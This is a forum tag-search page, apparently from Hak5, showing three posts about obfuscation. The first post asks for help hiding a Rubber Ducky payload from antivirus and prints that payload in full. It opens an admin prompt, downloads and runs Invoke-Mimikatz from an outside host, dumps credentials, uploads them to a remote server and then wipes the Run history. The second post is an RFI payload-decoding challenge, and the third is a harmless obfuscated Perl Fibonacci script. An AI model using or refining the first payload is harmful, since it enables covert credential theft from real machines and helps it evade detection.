Showing results for tags 'obfuscation'.

Found 3 results

  1. Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style

     I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it, modifying this string in the PowerShell script on Rubber Ducky:

         STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)"

     I've found some useful links (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/ and https://blog.den1al.com/2015/02/encoded-mimikatz-powershell-invoker/) but my coding skills are very limited and I'm searching for some help to successfully modify the scripts to work with Rubber Ducky.

     This is my faulty payload:

         REM Title: Invoke mimikatz and send creds to remote server
         REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
         DELAY 1000
         REM Open an admin command prompt
         GUI r
         DELAY 500
         STRING powershell Start-Process cmd -Verb runAs
         ENTER
         DELAY 2000
         ALT y
         DELAY 1000
         REM Obfuscate the command prompt
         STRING mode con:cols=18 lines=1
         ENTER
         STRING color FE
         ENTER
         REM Download and execute Invoke Mimikatz then upload the results
         STRING powershell "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://htmlguru.tk/im.ps1'))); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://htmlguru.tk/rx.php', $output)"
         ENTER
         DELAY 15000
         REM Clear the Run history and exit
         STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
         ENTER
         STRING exit
         ENTER

     Thank you in advance for help!
  2. So I see a lot of obfuscated/encoded PHP payloads used in RFI attacks. In general though, they are trivial to decode (decoding tool I develop: https://firebwall.com/decoding/index.php). After writing 2 papers on how and why they could be developed better (http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-P1.pdf http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-Part2.pdf (written with DigiP)), and only seeing simple increases in the attempt to hide information, I decided to spend an hour and write one that actually was not only hard to decode, but hard to take control over. I put this challenge to the Hak5 community: tell me the password I'm using and how to run commands. I'm certain the Transferable State Attack would help you in your decryption process. Here is the payload: http://pastebin.com/W92Q0Q9j Happy Hacking :D
  3. How's my obfuscation?

         my($a, $b, $c);($a,$b,$c) = floor();local $d= "\x53\x54\x44\x4f\x55\x54";my @z=('0','5','6','4',rand(10),'0','','3','8','4'); for($i=$z[int(4+(.714287*7))];$i<25;$i++){$c= $a+$b ;$a=$b;$b=$c;syswrite $d,"$c\x0A";} sub floor{return ("\x30"+ ( "\x31")*(((1-1)+1)/(1*1)) -(int(48*0.020833333))), $b=(int((20+1)*("0.0434782" ) )),$c = "\x".(4 +("\x2D". 1)).(0),,,,,,,,,,,,,};

     This Perl script simply prints the Fibonacci sequence. Alright Perl writers, how did I do? Post your own obfuscated Fibonacci sequence. Interested in what techniques I have not thought of. Any tips? Purely academic.